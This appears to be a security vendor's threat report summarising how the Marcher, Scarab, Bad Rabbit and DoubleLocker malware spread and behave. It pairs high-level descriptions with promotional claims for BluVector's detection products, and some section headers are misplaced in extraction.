BluVector’s patented machine learning malware detection engine detects the Marcher Android app as malicious. Regression testing has shown the file would have been detected by BluVector 11 months prior to its release. Note: BluVector would only detect the malware if the mobile device was connected to a corporate network monitored by a BluVector appliance.


TROJAN:Orcus Rat

What Is It?

The Marcher malware is part of a three-way attack aimed at customers of Austrian banks.

The first component of this attack is a phishing email containing a link, utilizing the bit.ly URL redirection service. The link takes the user to a phishing site that duplicates a bank’s legitimate online banking login page in an attempt to steal the user’s credentials. After the user enters his or her credentials, the fake site then also requests the user’s email address and phone number.

At this point, the second phase of the attack begins. The user is presented with a webpage advising that he or she does not have the bank’s required “Security App” and providing another bit.ly link and a QR code in order to download the app. There are even instructions on ac-cepting the Android system permissions requested by the app. The app is, of course, a variant of the Marcher banking trojan.

The third aspect of the attack is that, in addition to stealing the user’s online banking credentials, the Marcher trojan will also request credit card information be entered when certain apps are opened, such as the Google Play Store. The trojan also attempts to obtain other supporting information, such as the user’s date of birth, address, billing phone number and password by presenting fake Verified by Visa and MasterCard SecureCode screens.


Previous variants of Marcher malware have been distributed via text messages. In this case, propagation occurs by successfully socially engineering a user to install the malware, believing it to be an app required by his or her bank. This will only occur if the user has previously been socially engineered to click on the link in a phishing email and enter his or her credentials into a fake online banking site.

Attackers continue to use social engineering to exploit the most vulnerable component of any computer system: the user. They do so because this attack vector is reliably successful. User education is a critical part of securing any corporate network. With Android devices becoming more commonplace in enterprise networks due to BYOD policies, they can create a new threat vector for malware infections if not monitored and managed correctly.


BluVector’s patented machine learning malware detection engine detects the Marcher Android app as malicious. Regression testing has shown the file would have been detected by BluVector 11 months prior to its release. Note: BluVector would only detect the malware if the mobile device was connected to a corporate network monitored by a BluVector appliance.


TROJAN:Scarab

What Is It?

In the days leading up to the U.S. Thanksgiving break, a significant malicious spam campaign was launched to spread a new piece of ransomware known as Scarab. The timing was clearly deliberate in its social engineering approach as many people had already started their Thanksgiving break. It was designed to hit the inboxes of people in a rush to finish their work and start their holiday break, thus exercising less care and attention to what they were clicking.

It is reported that in the first four hours of this campaign, over 12.5 million spam emails were sent. The subject of the emails used a common lure of “Scanned from [printer name],” where “printer name” was Epson, HP, Lexmark or Canon. The campaign utilized the large Necurs botnet to send the spam emails from infected hosts.

Attached to the email was a Visual Basic Script compressed inside a 7-Zip file. Executing the Visual Basic Script resulted in downloading and executing the Scarab ransomware.

Scarab adds the extension “[[email protected]].scarab” to all files it encrypts, including data files as well as document and image file types.


The Scarab ransomware does not self-propagate, nor does it spread via an internal network.

It spreads via malicious spam, requiring users to be socially engineered to open the attached 7-Zip file and execute the Visual Basic Script in order to be infected. Once again, this highlights the importance of user education in securing the corporate IT environment.


BluVector’s patented machine learning malware detection engine detects the Scarab malware as malicious. Regression testing on the sample has shown the ransomware would have been detected by BluVector 11 months prior to its release.


What Is It?

On Oct. 24, 2017, a new strain of ransomware, referred to as Bad Rabbit, was used in a widespread campaign that reportedly caused issues for enterprises and infrastructure such as airports and train stations across Eastern Europe, Turkey and Germany.

Analysis of the malware code found similarities with previous large-scale ransomware attacks such as NotPetya and Petya. However, this malware does not use the EternalBlue exploit to propagate. Additionally, this malware appears not to be destructive as NotPetya was; it is purely ransomware.

A number of websites were compromised in Eastern Europe and Turkey and redirected users to a site serving a drive-by download of a fake Adobe Flash Player update. The drive-by download server was taken offline after approximately 6 hours.

The ransomware requested an initial ransom of 0.05 Bitcoin (US$274.86, as of the writing of this report) which increases the longer the ransom goes unpaid.

As is common with recent ransomware, it encrypts the Master Boot Record on the victim’s hard drive, rendering it unusable until the ransom is paid, after first encrypting files with the extensions of:

.3ds, .7z, .accdb, .ai, .asm, .asp, .aspx, .avhd,

.back, .bak, .bmp, .brw, .c, .cab, .cc, .cer, .cfg,

.conf, .cpp, .crt, .cs, .ctl, .cxx, .dbf, .der, .dib, .disk,

.djvu, .doc, .docx, .3ds, .7z, .accdb, .ai, .asm, .asp,

.aspx, .avhd, .back, .bak, .bmp, .brw, .c, .cab, .cc,

.cer, .cfg, .conf, .cpp, .crt, .cs, .ctl, .cxx, .dbf, .der,

RANSOMWARE:Bad Rabbit

.dib, .disk, .djvu, .doc, .docx, .dwg, .eml, .fdb, .gz,

.h, .hdd, .hpp, .hxx, .iso, .java, .jfif, .jpe, .jpeg, .jpg,

.js, .kdbx, .key, .mail, .mdb, .msg, .nrg, .odc, .odf,

.odg, .odi, .odm, .odp, .ods, .odt, .ora, .ost, .ova,

.ovf, .p12, .p7b, .p7c, .pdf, .pem, .pfx, .php, .pmf,

.png, .ppt, .pptx, .ps1, .pst, .pvi, .py, .pyc, .pyw,

.qcow, .qcow2, .rar, .rb, .rtf, .scm, .sln, .sql, .tar, .tib,

.tif, .tiff, .vb, .vbox, .vbs, .vcb, .vdi, .vfd, .vhd, .vhdx,

.vmc, .vmdk, .vmsd, .vmtm, .vmx, .vsdx, .vsv, .work,

.xls, .xlsx, .xml, .xvd, .zip


Bad Rabbit spreads via compromised websites redirecting to a drive-by download of the malware, which claims to be an Adobe Flash Player update.

This malware also contains a list of weak passwords which it can utilize to propagate over the network. It does not utilize any exploits.

As this attack initially requires a user to execute the fake Adobe Flash Player update, end-user education is always a critical component of securing a corporate environment.


BluVector’s machine learning malware detection engine detects the fake Adobe Flash Player update as malicious. Regression testing has shown the file would have been detected by BluVector 10 months prior to the malware’s release.


What Is It?

Various news articles have described a new strain of Android ransomware known as DoubleLocker. The malware is so named as it not only encrypts data files on an infected smartphone, it also alters the PIN of the device. Files are encrypted using a correct implementation of the AES algorithm and have the file extension “.cryeye” added to encrypted filenames.

If the ransom of 0.013 Bitcoin is paid within the permitted two-hour time frame, the malicious actors can reset the device’s PIN and decryptthe files.


The malware is said to be spreading mostly via compromised websites offering a fake Adobe Flash Player download.


The Android APK file is identified as malicious by BluVector’s machine learning malware detection engine. Regression testing has shown this file would have been detected by BluVector 10 months prior to it being released. Note: BluVector would only detect the malware if the Android device was connected to a corporate network monitored by a BluVector appliance.

RANSOMWARE:DoubleLocker Android


About BluVector

www.bluvector.io 571.565.2100

GET AHEAD OF THE THREAT

BluVector is revolutionizing network security with state-of-the-art AI, sensing and responding to the world's most sophisticated threats in real time. With the unmatched advantage of 8 years of work with the US Intel Community and their threat data, only BluVector has the proven ability to protect against emerging threats on average 13 months in advance.

Stop waiting for breaches to happen.

GET AHEAD OF THE THREAT.

BLUVECTOR MLE

BluVector MLE is a patented supervised Machine Learning Engine that was developed within the defense and intelligence community to accurately detect zero-day and polymorphic malware in real time. Unlike unsupervised machine learning, which is leveraged by most security vendors today, BluVector MLE algorithms were pre-trained to immediately identify malicious content embedded within common file formats like Office documents, archives, executables, .pdf, and system updates. The result: 99.1%+ detection accuracy upon installation.

BLUVECTOR SCE

BluVector SCE is the security market’s first analytic specifically designed to detect fileless malware as it traverses the network. By emulating how the malware will behave when it is executed, the Speculative Code Execution engine determines, at line speed, what an input can do if executed and to what extent these behaviors might initiate a security breach. By covering all potential execution chains and focusing on malicious capacity rather than malicious behavior, the analytic technology vastly reduces the number of execution environments and the quantity of analytic results that must be investigated. The result: 99%+ detection accuracy of this otherwise “invisible” threat.


bluvector threat report€¦ · threat report q1 2018 bluvector runs all discovered malware samples...

Documents